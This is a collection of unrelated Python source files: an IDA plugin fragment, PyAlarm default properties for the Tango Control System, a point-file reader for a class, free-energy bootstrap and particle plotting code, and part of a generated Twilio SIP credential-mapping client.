ida_kernwin.SETMENU_APP
)
print("[Export-Xref] Loaded")
return ida_idaapi.PLUGIN_OK
def run(self, arg):
pass
def term(self):
pass
def PLUGIN_ENTRY():
return export_xref_t() |
py | 7dfaee814a9ba6ec5a96cf9049f64a3ecfaca822 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#############################################################################
##
## This file is part of Tango Control System
##
## http://www.tango-controls.org/
##
## Author: Sergi Rubio Manrique
##
## This is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
##
## This software is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, see <http://www.gnu.org/licenses/>.
###########################################################################
__doc__ = """
=================================
PyAlarm Device Default Properties
=================================
"""
import fandango as fd
from fandango.functional import join,djoin,time2str,str2time
from fandango.tango import PyTango,get_tango_host
try:
tango_host = get_tango_host().split(':')[0]
except:
tango_host = 'PyAlarm'
#@TODO: ERROR as a positive value causes problems to Eval
#(but it must be positive to appear first on lists?)
#The higher the value, the higher it will appear on View lists
AlarmStates = fd.Struct({
'NORM':0, #Normal state
'RTNUN':1, #Active but returned to normal
'ACKED':2, #Acknowledged by operator
'ACTIVE':3, #UNACK alias
'UNACK':4, #Active and unacknowledged
'ERROR':-1, #PyAlarm not working properly, exception on formula
'SHLVD':-2, #Silenced, hidden, ignored, (DEBUG), temporary state
'DSUPR':-3, #Disabled by a process condition (Enabled), failed not throwed
'OOSRV':-4, #Unconditionally disabled, Enable = False, Device is OFF
})
ACTIVE_STATES = 'ACTIVE','UNACK','ACKED','RTNUN'
DISABLED_STATES = 'ERROR','SHLVD','OOSRV','DSUPR'
SORT_ORDER = ('Error','Active','_State','Priority','Time')
#@TODO: Rename to PRIORITIES, adapt to IEC Document
SEVERITIES = {'DEBUG':0,
'INFO':1,
'WARNING':2,
'ALARM':3,
'ERROR':4,
'CONTROL':-1
}
DEFAULT_SEVERITY = 'WARNING'
SUMMARY_FIELDS = 'tag','state','priority','time','formula','message'
# Must be lists, not tuples
DATA_FIELDS = ('tag','device','priority','formula',
'message','annunciators')
STATE_FIELDS = ('state','time','counter','active','disabled',
'acknowledged','updated','last_sent','last_error')
#ALARM_ROW = ['tag','get_state','get_time','device','description']
#DEFAULT_COLUMNS = ['tag','get_state','active','get_time','severity']
VIEW_FIELDS = ['tag','device','state','priority','time']
CSV_FIELDS = 'tag,device,description,severity,receivers,formula'.split(',')
FORMATTERS = fd.defaultdict(lambda :str)
FORMATTERS.update({
'tag' : lambda s,l=10: ('{0:<%d}'%(l or 4)).format(s),
#'time' : lambda s,l=25: ('{:^%d}'%l).format(s),
'device' : lambda s,l=25: ('{0:^%d}'%(l or 4)).format(s),
'description' : lambda s,l=50: ('{0:<}').format(s),
'message' : lambda s,l=50: ('{0:<}').format(s),
'severity' : lambda s,l=10: ('{0:^%d}'%(l or 4)).format(s),
'priority' : lambda s,l=10: ('{0:^%d}'%(l or 4)).format(s),
'get_state' : lambda s,l=10: ('{0:^%d}'%(l or 4)).format(s),
'get_time' :
lambda s,l=20: ('{0:^%d}'%(l or 4)).format(time2str(s,bt=0)),
'active' : lambda s,l=20: (('{0:^%d}'%(l or 4)).format(
'FAILED!' if s is None else (
'Not Active' if not s else (
s if s in (1,True) else (
time2str(s,bt=0)))))),
'formula' : lambda s,l=100: ('{0:^%d}'%(l or 4)).format(s),
#'tag' : lambda s,l: ('{:^%d}'%l).format(s),
})
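# Hedged illustration (sample values only) of the formatter behaviour defined above:
# each lambda pads or centres its field to a fixed column width.
def _example_formatters():
    assert FORMATTERS['tag']('TAG1') == 'TAG1'.ljust(10)          # left-justified, width 10
    assert FORMATTERS['severity']('ALARM') == 'ALARM'.center(10)  # centred, width 10
    return FORMATTERS['get_time'](0)  # epoch seconds rendered through time2str()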
INFO_REQUESTS = ['SETTINGS','STATE','VALUES','SNAP']
#THIS ARE ALSO THE DIFFERENT ACTION TYPES TO BE CONFIGURED
MESSAGE_TYPES = ['ALARM','ACKNOWLEDGED','RECOVERED','REMINDER',
'AUTORESET','RESET','DISABLED',]
__doc__+="""
PANIC_PROPERTIES: This properties will be shared by the whole TANGO_HOST
"""
PANIC_PROPERTIES = {
'PhoneBook':
[PyTango.DevVarStringArray,
"List of receiver aliases, declared like:\n\
\t%USER:[email protected];SMS:+34666555666",
[] ],
'SMSConfig':
[PyTango.DevString,
"Arguments for sendSMS command",
[ ] ],#user:word
'SMSMaxLength':
[PyTango.DevLong,
"Maximum length of SMS messages",
[ 135 ] ],
'SMSMaxPerDay':
[PyTango.DevLong,
"Maximum SMS messages per day",
[ 50 ] ],
'MailMethod':
[PyTango.DevString,
"mail or smtp[:host[:port]]",
[ "mail" ] ],
'MailDashRoption':
[PyTango.DevString,
"If not empty, use -r to specify from_address instead of -S from=. "
"Required in Debian and other linux systems",
[ "true" ] ],
'FromAddress':
[PyTango.DevString,
"Address that will appear as Sender in mail and SMS",
[ tango_host ] ],
'AllowedActions':
[PyTango.DevVarStringArray,
"List of OS commands that alarms are able to execute.",
[] ],
'StartupDelay':
[PyTango.DevLong,
"Number of seconds that PyAlarm will "
"wait before starting to evaluate alarms.",
[ 0 ] ],
'PanicAdminUsers':
[PyTango.DevVarStringArray,
"Users authorized to modify the Alarms (apart of receivers) ",
[ ] ],
'PanicUserTimeout':
[PyTango.DevLong,
"Number of seconds to keep user login in panic GUI",
[ 60 ] ],
'UserValidator':
[PyTango.DevString,
"Module.Class to be used to validate admin user/passwords.",
[ ] ],
'GlobalReceivers':
[PyTango.DevVarStringArray,
"Receivers to be applied globally to all alarms\n\
Declared as FILTER:receiver,ACTION(MESSAGE:...) like\n\
\t*VC*:[email protected],ACTION(RESET:command,t/t/t/stop)",
[ 0 ] ],
'AlarmWikiLink':
[PyTango.DevString,
"An URL to a WiKi page, where one can find more info on alarma. If set it will appear in AlarmEditor widget.\n\
The URL may contain {%ALARM%} which is then substituted with an alarm tag. ",
[ ] ],
}
__doc__+="""
ALARM_TABLES: Properties used to store Alarms declaration in Panic<=6
This properties will be managed by API;
DON'T ACCESS THEM WITH self.$Property from the device
"""
ALARM_TABLES = {
'AlarmList':
[PyTango.DevVarStringArray,
"List of alarms to be monitorized. The format is:\n<br>"
"domain/family/member #It simply checks that dev is alive\n<br>"
"domain/family/member/attribute > VALUE\n<br>"
"domain/family/member/State == UNKNOWN\n<br>"
"domain/family/*/Temperature > VALUE\n<br>\n<br>"
"When using wildcards all slash / must be included",
[] ],
'AlarmReceivers':
[PyTango.DevVarStringArray,
"Users that will be notified for each alarm. The format is:\n<br>"
"[TYPE]:[ADDRESS]:[attributes];...\n<br>\n<br>"
"[TYPE]: MAIL / SMS\n<br>"
"[ADDRESS] : [email protected] / +34666555444\n<br>"
"[attributes]: domain/family/member/attribute;domain/family/*",
[] ],
'AlarmDescriptions':
[PyTango.DevVarStringArray,
"Description to be included in emails for each alarm.\n<br>"
"The format is:TAG:AlarmDescription...",
[] ],
'AlarmConfigurations':
[PyTango.DevVarStringArray,
"Configuration customization appliable to each alarm.\n<br>"
"The format is: TAG:PAR1=Value1;PAR2=Value2;...",
[] ],
'AlarmSeverities':
[PyTango.DevVarStringArray,
"ALARM:DEBUG/INFO/WARNING/ALARM/ERROR\n<br>"
"#DEBUG alarms will not trigger messages",
[] ],
}
__doc__+="""
ALARM_CYCLE: Properties to manage the timing of Alarm stages
"""
ALARM_CYCLE = {
'Enabled':
[PyTango.DevString,
"If False forces the device to Disabled state and avoids messaging;"
" if INT then it will last only for N seconds after Startup; "
"if a python formula is written it will enable/disable the device",
[ '120' ] ],#Overriden by panic.DefaultPyAlarmProperties
'AlarmThreshold':
[PyTango.DevLong,
"Min number of consecutive Events/Pollings that must trigger an Alarm.",
[ 3 ] ],
'AlertOnRecovery':
[PyTango.DevString,
"It can contain 'email' and/or 'sms' keywords to specify "
"if an automatic message must be sent in case of alarm "
"returning to safe level.",
[ "false" ] ],
'PollingPeriod':
[PyTango.DevFloat,
"Period in SECONDS to poll all not event-driven attributes."
"@TODO for convenience any value above 300 will be divided by 1000, "
"@DEPRECATE",
[ 15. ] ],
'Reminder':
[PyTango.DevLong,
"If a number of seconds is set, a reminder mail will be sent "
"while the alarm is still active, if 0 no Reminder will be sent.",
[ 0 ] ],
'AutoReset':
[PyTango.DevFloat,
"If a number of seconds is set, the alarm will reset if "
"the conditions are no longer active after the given interval.",
[ 3600. ] ],
'RethrowState':
[PyTango.DevBoolean,
"Whether exceptions in State reading will activate the Alarm.",
[ True ] ],
'RethrowAttribute':
[PyTango.DevBoolean,
"Whether exceptions in Attribute reading will activate the Alarm.",
[ False ] ],
'IgnoreExceptions':
[PyTango.DevString,
"Value can be False/True/NaN to return Exception, None or NotANumber"
" in case of read_attribute exception.",
[ 'True' ] ],#Overriden by panic.DefaultPyAlarmProperties
}
__doc__+="""
ALARM_ARCHIVE: Properties to manage the saving of Alarms
"""
ALARM_ARCHIVE = {
'UseSnap':
[PyTango.DevBoolean,
"If false no snapshots will be trigered "
"(unless specifically added to receivers)",
[ True ] ],
'CreateNewContexts':
[PyTango.DevBoolean,
"It enables PyAlarm to create new contexts for alarms "
"if no matching context exists in the database.",
[ False ] ],
}
__doc__+="""
ALARM_LOGS: Properties to manage the logging of Alarms
"""
ALARM_LOGS = {
'LogFile':
[PyTango.DevString,
"""File where alarms are logged, like /tmp/alarm_$NAME.log\n
Keywords are $DEVICE,$ALARM,$NAME,$DATE\n
If version>6.0 a FolderDS-like device can be used for remote logging:\n
\ttango://test/folder/01/$ALARM_$DATE.log""",
[ "" ] ],
'HtmlFolder':
[PyTango.DevString,
"File where alarm reports are saved",
[ "htmlreports" ] ],
'FlagFile':
[PyTango.DevString,
"File where a 1 or 0 value will be written depending if theres "
"active alarms or not.\n<br>This file can be used by other "
"notification systems.",
[ "/tmp/alarm_ds.nagios" ] ],
'MaxMessagesPerAlarm':
[PyTango.DevLong,
"Max Number of messages to be sent each time that an Alarm "
"is activated/recovered/reset.",
[ 0 ] ],
'MailMethod':
[PyTango.DevString,
"mail or smtp[:host[:port]]",
[ "mail" ] ],
'FromAddress':
[PyTango.DevString,
"Address that will appear as Sender in mail and SMS",
[ tango_host ] ],
'SMSConfig':
[PyTango.DevString,
"Arguments for sendSMS command (user:word)",
[ ] ],
'TGConfig':
[PyTango.DevString,
"Arguments for sendTelegram command",
[ "" ] ],
}
__doc__+="""
DEVICE_CONFIG: PyAlarm/PanicDS instance configuration.
"""
DEVICE_CONFIG = {
'VersionNumber':
[PyTango.DevString,
"API version used (device-managed)",
[ "6.1.1" ] ],
'LogLevel':
[PyTango.DevString,
"stdout log filter",
[ "INFO" ] ],
'StartupDelay':
[PyTango.DevLong,
"Number of seconds that PyAlarm will wait before starting.",
[ 0 ] ],
'EvalTimeout':
[PyTango.DevLong,
"Timeout for read_attribute calls, in milliseconds .",
[ 500 ] ],
'UseProcess':
[PyTango.DevBoolean,
"To create new OS processes instead of threads.",
[ False ] ],
'UseTaurus':
[PyTango.DevBoolean,
"Use Taurus to connect to devices instead of plain PyTango.",
[ False ] ],
}
TODO_LIST = {
'PushEvents':
[PyTango.DevVarStringArray,
"Events to be pushed by Alarm and AlarmLists attributes",
[] ] ,
}
PyAlarmDefaultProperties = dict(join(d.items() for d in
(ALARM_CYCLE,ALARM_ARCHIVE,ALARM_LOGS,DEVICE_CONFIG)))
DEVICE_PROPERTIES = dict(join(v.items() for v in
(PyAlarmDefaultProperties,ALARM_TABLES)))
ALARM_CONFIG = (ALARM_CYCLE.keys()+ALARM_ARCHIVE.keys()
+ALARM_LOGS.keys()+DEVICE_CONFIG.keys())
try:
from fandango.doc import get_fn_autodoc
__doc__ = get_fn_autodoc(__name__,vars(),
module_vars=['PANIC_PROPERTIES','DEVICE_CONFIG','ALARM_LOGS',
'ALARM_CYCLE','ALARM_TABLES','ALARM_ARCHIVE'])
except:
import traceback
traceback.print_exc()
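# Hedged illustration only: every entry in the property dictionaries above is a
# [PyTango type, description, default value] triple, so a default can be read
# back as shown below (EvalTimeout is just a sample key).
def _example_property_entry(name='EvalTimeout'):
    ptype, description, default = DEVICE_CONFIG[name]
    return ptype, default  # -> (PyTango.DevLong, [500]) for the sample key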
|
py | 7dfaef16762b277d5acfed569191825d87ac3965 | # Demonstration Python module for Week 3
# Scientific Computing, Fall 2021, [email protected]
# Read source points and target points from files.
import numpy as np # general numpy
SourcePointsFile = "SourcePoints.txt"
TargetPointsFile = "TargetPoints.txt"
# Source points
def read():
inFile = open( SourcePointsFile, "r") # open the source points file
firstLine = inFile.readline() # the first line has the number of points
nPoints = int(firstLine) # convert the number from string to int
sourcePoints = np.zeros([nPoints,3]) # the source points array
for p in range(nPoints):
dataLine = inFile.readline() # there is one point per line
words = dataLine.split() # each word is a number
x = np.float64(words[0]) # x, y, and z coordinates
y = np.float64(words[1]) # convert from string to float
z = np.float64(words[2])
sourcePoints[p,0] = x # save the numbers in the numpy array
sourcePoints[p,1] = y
sourcePoints[p,2] = z
inFile.close()
# target points
inFile = open( TargetPointsFile, "r") # open the source points file
firstLine = inFile.readline() # the first line has the number of points
nPoints = int(firstLine) # convert the number from string to int
targetPoints = np.zeros([nPoints,3]) # the source points array
for p in range(nPoints):
dataLine = inFile.readline() # there is one point per line
words = dataLine.split() # each word is a number
x = np.float64(words[0]) # x, y, and z coordinates
y = np.float64(words[1]) # convert from string to float
z = np.float64(words[2])
targetPoints[p,0] = x # save the numbers in the numpy array
targetPoints[p,1] = y
targetPoints[p,2] = z
inFile.close()
return sourcePoints, targetPoints
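# Hedged usage sketch: assumes SourcePoints.txt and TargetPoints.txt exist in the
# working directory with the format parsed above (first line = number of points,
# then one "x y z" triple per line).
if __name__ == "__main__":
    sourcePoints, targetPoints = read()
    print("read", sourcePoints.shape[0], "source points and",
          targetPoints.shape[0], "target points")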
|
py | 7dfaf07e43c10f31685335b99495920ed85f6b19 | import numpy as np
import matplotlib.pyplot as plt
def free_energy_bootstrap(D, l, r, n, sample=100, weights=None, bias=None, temperature=1.0):
""" Bootstrapped free energy calculation
If D is a single array, bootstraps by sample. If D is a list of arrays, bootstraps by trajectories
Parameters
----------
    D : array or list of arrays
Samples in the coordinate in which we compute the free energy
l : float
leftmost bin boundary
r : float
rightmost bin boundary
n : int
number of bins
sample : int
number of bootstraps
weights : None or arrays matching D
sample weights
bias : function
if not None, the given bias will be removed.
Returns
-------
bin_means : array((nbins,))
mean positions of bins
Es : array((sample, nbins))
for each bootstrap the free energies of bins.
"""
bins = np.linspace(l, r, n)
Es = []
I = np.arange(len(D))
by_traj = isinstance(D, list)
for s in range(sample):
Isel = np.random.choice(I, size=len(D), replace=True)
if by_traj:
Dsample = np.concatenate([D[i] for i in Isel])
Wsample = None
if weights is not None:
Wsample = np.concatenate([weights[i] for i in Isel])
Psample, _ = np.histogram(Dsample, bins=bins, weights=Wsample, density=True)
else:
Dsample = D[Isel]
Wsample = None
if weights is not None:
Wsample = weights[Isel]
Psample, _ = np.histogram(Dsample, bins=bins, weights=Wsample, density=True)
Es.append(-np.log(Psample))
Es = np.vstack(Es)
Es -= Es.mean(axis=0).min()
bin_means = 0.5 * (bins[:-1] + bins[1:])
if bias is not None:
B = bias(bin_means) / temperature
Es -= B
return bin_means, Es # / temperature
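# Hedged, self-contained illustration (synthetic data, arbitrary bin range): draw
# samples from a double-well-like mixture and bootstrap their free energy profile.
def _example_free_energy_bootstrap():
    samples = np.concatenate([np.random.normal(-1.0, 0.3, 5000),
                              np.random.normal(1.0, 0.3, 5000)])
    bin_means, Es = free_energy_bootstrap(samples, l=-2.5, r=2.5, n=50, sample=20)
    return bin_means, mean_finite(Es, axis=0)  # mean profile over the bootstraps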
def mean_finite_(x, min_finite=1):
""" Computes mean over finite values """
isfin = np.isfinite(x)
if np.count_nonzero(isfin) > min_finite:
return np.mean(x[isfin])
else:
return np.nan
def std_finite_(x, min_finite=2):
""" Computes mean over finite values """
isfin = np.isfinite(x)
if np.count_nonzero(isfin) > min_finite:
return np.std(x[isfin])
else:
return np.nan
def mean_finite(x, axis=None, min_finite=1):
if axis is None:
return mean_finite_(x)
if axis == 0 or axis == 1:
M = np.zeros((x.shape[axis - 1],))
for i in range(x.shape[axis - 1]):
if axis == 0:
M[i] = mean_finite_(x[:, i])
else:
M[i] = mean_finite_(x[i])
return M
else:
raise NotImplementedError('axis value not implemented:', axis)
def std_finite(x, axis=None, min_finite=2):
if axis is None:
        return std_finite_(x)
if axis == 0 or axis == 1:
S = np.zeros((x.shape[axis - 1],))
for i in range(x.shape[axis - 1]):
if axis == 0:
S[i] = std_finite_(x[:, i])
else:
S[i] = std_finite_(x[i])
return S
else:
raise NotImplementedError('axis value not implemented:', axis)
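# Hedged worked example (values chosen for illustration): non-finite entries are
# ignored, and a column with too few finite values (<= min_finite) comes back NaN.
def _example_finite_stats():
    x = np.array([[1., np.inf], [3., 5.], [5., 7.]])
    assert np.allclose(mean_finite(x, axis=0), [3., 6.])
    s = std_finite(x, axis=0)
    assert np.isclose(s[0], np.std([1., 3., 5.])) and np.isnan(s[1])
    return s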
def distance(x, particles, dims):
"""Returns distances between particles"""
x = x.reshape(-1, particles, dims)
distances = np.sqrt(np.power((np.expand_dims(x, 1) - np.expand_dims(x, 2)), 2).sum(-1))
# take only the relevant terms (upper triangular)
row_idx, col_idx = np.triu_indices(distances.shape[1], 1)
return distances[:, row_idx, col_idx]
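# Hedged worked example: two particles in 2D at (0, 0) and (3, 4) have a single
# pairwise distance of 5.
def _example_distance():
    x = np.array([[0., 0., 3., 4.]])  # one configuration, flattened (particle, dim) coordinates
    assert np.allclose(distance(x, particles=2, dims=2), [[5.]])
    return distance(x, particles=2, dims=2)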
def energy_plot(x, potential):
if potential == "dimer":
d = x - 3
d2 = d ** 2
d4 = d2 ** 2
return -4. * d2 + 1. * d4
elif potential == "prince":
"""Prince energy"""
x = x - 2
x1 = x ** 8
x2 = np.exp(-80. * x * x)
x3 = np.exp(-80. * (x - 0.5) ** 2)
x4 = np.exp(-40. * (x + 0.5) ** 2)
return 4 * (1. * x1 + 0.8 * x2 + 0.2 * x3 + 0.5 * x4)
def plot_system(x, n_particles, n_dimensions, n_plots=(4, 4),
lim=4):
"""Plot system of 4 particles."""
x = x.reshape(-1, n_particles, n_dimensions)
# np.random.shuffle(x)
if n_dimensions > 2:
raise NotImplementedError("dimension must be <= 2")
plt.figure(figsize=(n_plots[1] * 2, n_plots[0] * 2))
for i in range(np.prod(n_plots)):
plt.subplot(*n_plots, i+1)
plt.scatter(*x[i].T)
#plt.xticks([])
#plt.yticks([])
plt.tight_layout()
plt.xlim((-lim, lim))
plt.ylim((-lim, lim))
############################## Plotting #######################################
def create_plots_2part(file, filename, fixed_z, x_samples, delta_logp, potential, epoch):
"""Plots for 2 particle dimer."""
data_shape = x_samples.shape[1]
n_dims = data_shape // 2
fig_filename = os.path.join(file, filename, "pos" + "{:04d}.jpg".format(epoch))
utils.makedirs(os.path.dirname(fig_filename))
generated_samples = x_samples.view(-1, data_shape).data.cpu().numpy()
# plot dimer
if n_dims == 2:
plt.figure(figsize=(5, 4))
for point in generated_samples[100:200]:
plt.plot([point[0], point[2]], [point[1], point[3]], 'k-', lw=0.5)
plt.scatter(point[0], point[1], c='r', marker='x')
plt.scatter(point[2], point[3], c='b', marker='x')
plt.savefig(fig_filename, bbox_inches='tight')
generated_samples = distance(x_samples.data.cpu().numpy(), 2, n_dims).reshape(-1)
jac = - delta_logp.data.cpu().view(-1).numpy()
plt.figure(figsize=(5, 4))
h, b = np.histogram(generated_samples, bins=100)
Eh = -np.log(h)
Eh = Eh - Eh.min()
if potential == "prince":
d = np.linspace(0, 4, num=200)
elif potential == "dimer":
d = np.linspace(0, 6, num=200)
energies = energy_plot(d, potential) - (n_dims - 1) * np.log(d)
plt.plot(d, energies - energies.min(), linewidth=2, )
bin_means = 0.5 * (b[:-1] + b[1:])
plt.plot(bin_means, Eh)
plt.ylim(0, 6)
fig_filename = os.path.join(file, filename, "{:04d}.jpg".format(epoch))
plt.savefig(fig_filename, bbox_inches='tight')
# reweighting factor
print(jac.shape, energy_plot(generated_samples, potential).shape, (0.5 * np.sum(fixed_z.view(-1, data_shape).data.cpu().numpy() ** 2, axis=1)).shape)
log_w = - energy_plot(generated_samples, potential) + 0.5 * np.sum(fixed_z.view(-1, data_shape).data.cpu().numpy() ** 2, axis=1) + jac
print(np.mean(energy_plot(generated_samples, potential)), np.mean(0.5 * np.sum(fixed_z.view(-1, data_shape).data.cpu().numpy() ** 2, axis=1)), np.mean(jac))
print(min(log_w), max(log_w))
plt.figure(figsize=(5, 4))
if potential == "prince":
bin_means, Es = free_energy_bootstrap(generated_samples, -4, 4, 100, sample=100, weights=np.exp(log_w))
elif potential == "dimer":
bin_means, Es = free_energy_bootstrap(generated_samples, 0, 10, 100, sample=100,
weights=np.exp(log_w))
plt.plot(d, energies - energies.min(), linewidth=2, )
Emean = mean_finite(Es, axis=0)
Estd = std_finite(Es, axis=0)
plt.fill_between(bin_means, Emean, Emean + Estd, alpha=0.2)
plt.fill_between(bin_means, Emean, Emean - Estd, alpha=0.2)
plt.plot(bin_means, Emean)
plt.ylim(0, 6)
fig_filename = os.path.join(file, filename, "rew" + "{:04d}.jpg".format(epoch))
utils.makedirs(os.path.dirname(fig_filename))
plt.savefig(fig_filename, bbox_inches='tight')
def create_plots_3part(file, filename, fixed_z, x_samples, delta_logp, potential, epoch):
fig_filename = os.path.join(file, filename, "pos" + "{:04d}.jpg".format(epoch))
utils.makedirs(os.path.dirname(fig_filename))
data_shape = x_samples.shape[1]
n_dims = data_shape // 3
generated_samples = x_samples.view(-1, data_shape).data.cpu().numpy()
# plot mean of dimer
plt.figure(figsize=(5, 4))
for point in generated_samples[1000:1020]:
plt.plot([point[0], point[2]], [point[1], point[3]], 'k-', lw=0.2)
plt.plot([point[0], point[4]], [point[1], point[5]], 'k-', lw=0.2)
plt.plot([point[2], point[4]], [point[3], point[5]], 'k-', lw=0.2)
plt.scatter(point[0], point[1], c='r', marker='x')
plt.scatter(point[2], point[3], c='b', marker='x')
plt.scatter(point[4], point[5], c='g', marker='x')
plt.savefig(fig_filename, bbox_inches='tight')
plt.figure(figsize=(5, 4))
dists = distance(generated_samples, 3, n_dims)
plt.hist(np.sum(energy_plot(dists, potential), axis=-1), bins=1000, density=True)
plt.xlabel('Energy')
plt.ylabel('Probability')
plt.xlim(-13, 20)
fig_filename = os.path.join(file, filename, "energy" + "{:04d}.jpg".format(epoch))
plt.savefig(fig_filename, bbox_inches='tight')
dists = distance(generated_samples, 3, n_dims)
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
xs = dists[:, 0][np.where(dists[:, 2] < 3)]
ys = dists[:, 1][np.where(dists[:, 2] < 3)]
zs = dists[:, 2][np.where(dists[:, 2] < 3)]
ax.scatter(xs, ys, zs, c="r", marker='.', s=[1, 1, 1])
ax.set_xlabel('Dist 1')
ax.set_ylabel('Dist 2')
ax.set_zlabel('Dist 3')
# ax.set_zlim(0,3)
fig_filename = os.path.join(file, filename, "bottom" + "{:04d}.jpg".format(epoch))
utils.makedirs(os.path.dirname(fig_filename))
plt.savefig(fig_filename, bbox_inches='tight')
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
xs = dists[:, 0][np.where(dists[:, 2] > 3)]
ys = dists[:, 1][np.where(dists[:, 2] > 3)]
zs = dists[:, 2][np.where(dists[:, 2] > 3)]
ax.scatter(xs, ys, zs, c="r", marker='.', s=[1, 1, 1])
ax.set_xlabel('Dist 1')
ax.set_ylabel('Dist 2')
ax.set_zlabel('Dist 3')
# ax.set_zlim(0,3)
fig_filename = os.path.join(file, filename, "top" + "{:04d}.jpg".format(epoch))
utils.makedirs(os.path.dirname(fig_filename))
plt.savefig(fig_filename, bbox_inches='tight')
# TODO reweighting
# projection on axis
for i, a in enumerate("xyz"):
plt.figure(figsize=(5, 4))
h, b = np.histogram(dists[:, i], bins=100)
Eh = -np.log(h)
Eh = Eh - Eh.min()
d = np.linspace(0, 6, num=200)
energies = energy_plot(d, potential) - np.log(d)
plt.plot(d, energies - energies.min(), linewidth=2, )
bin_means = 0.5 * (b[:-1] + b[1:])
plt.plot(bin_means, Eh)
plt.ylim(0, 6)
fig_filename = os.path.join(file, filename, a+"{:04d}.jpg".format(epoch))
utils.makedirs(os.path.dirname(fig_filename))
plt.savefig(fig_filename, bbox_inches='tight')
def create_plots_4part(file, filename, fixed_z, x_samples, delta_logp, potential, epoch):
fig_filename = os.path.join(file, filename, "pos" + "{:04d}.jpg".format(epoch))
utils.makedirs(os.path.dirname(fig_filename))
data_shape = x_samples.shape[1]
n_dims = data_shape // 4
generated_samples = x_samples.view(-1, data_shape).data.cpu().numpy()
plot_system(generated_samples, 4, n_dims)
plt.savefig(fig_filename, bbox_inches='tight')
plt.figure(figsize=(5, 4))
dists = distance(generated_samples, 4, n_dims)
plt.hist(np.sum(energy_plot(dists, potential), axis=-1), bins=1000, density=True)
plt.xlabel('Energy')
plt.ylabel('Probability')
plt.xlim(-25, 20)
fig_filename = os.path.join(file, filename, "energy" + "{:04d}.jpg".format(epoch))
plt.savefig(fig_filename, bbox_inches='tight')
n_particles = 4
n_dimensions = 2
plt.figure(figsize=(10, 10))
# dists = all_distances(torch.Tensor(data).view(-1, n_particles, n_dimensions)).numpy()
plot_idx = 1
for i in range(n_particles):
for j in range(n_particles - 1):
values, bins = np.histogram(dists[:, i + j], bins=100)
values = -np.log(values)
plt.subplot(n_particles, n_particles - 1, plot_idx)
d = np.linspace(0, 6, num=200)
energies = energy_plot(d, potential) - np.log(d)
plt.plot(d, energies - energies.min(), linewidth=2, )
plt.ylim(0, 6)
plt.plot((bins[1:] + bins[:-1]) / 2, values - values.min())
plot_idx += 1
# ax.set_zlim(0,3)
fig_filename = os.path.join(file, filename, "Distances" + "{:04d}.jpg".format(epoch))
utils.makedirs(os.path.dirname(fig_filename))
plt.savefig(fig_filename, bbox_inches='tight')
|
py | 7dfaf086c106661fe4a1e1e011a69e14ccfdb21a | # coding=utf-8
"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.exceptions import TwilioException
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class CredentialListMappingList(ListResource):
def __init__(self, version, account_sid, domain_sid):
"""
Initialize the CredentialListMappingList
:param Version version: Version that contains the resource
:param account_sid: The account_sid
:param domain_sid: A string that uniquely identifies the SIP Domain
:returns: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingList
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingList
"""
super(CredentialListMappingList, self).__init__(version)
# Path Solution
self._solution = {
'account_sid': account_sid,
'domain_sid': domain_sid,
}
self._uri = '/Accounts/{account_sid}/SIP/Domains/{domain_sid}/CredentialListMappings.json'.format(**self._solution)
def create(self, credential_list_sid):
"""
Create a new CredentialListMappingInstance
:param unicode credential_list_sid: The credential_list_sid
:returns: Newly created CredentialListMappingInstance
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance
"""
data = values.of({
'CredentialListSid': credential_list_sid,
})
payload = self._version.create(
'POST',
self._uri,
data=data,
)
return CredentialListMappingInstance(
self._version,
payload,
account_sid=self._solution['account_sid'],
domain_sid=self._solution['domain_sid'],
)
def stream(self, limit=None, page_size=None):
"""
Streams CredentialListMappingInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(
page_size=limits['page_size'],
)
return self._version.stream(page, limits['limit'], limits['page_limit'])
def list(self, limit=None, page_size=None):
"""
Lists CredentialListMappingInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance]
"""
return list(self.stream(
limit=limit,
page_size=page_size,
))
def page(self, page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of CredentialListMappingInstance records from the API.
Request is executed immediately
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of CredentialListMappingInstance
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingPage
"""
params = values.of({
'PageToken': page_token,
'Page': page_number,
'PageSize': page_size,
})
response = self._version.page(
'GET',
self._uri,
params=params,
)
return CredentialListMappingPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of CredentialListMappingInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of CredentialListMappingInstance
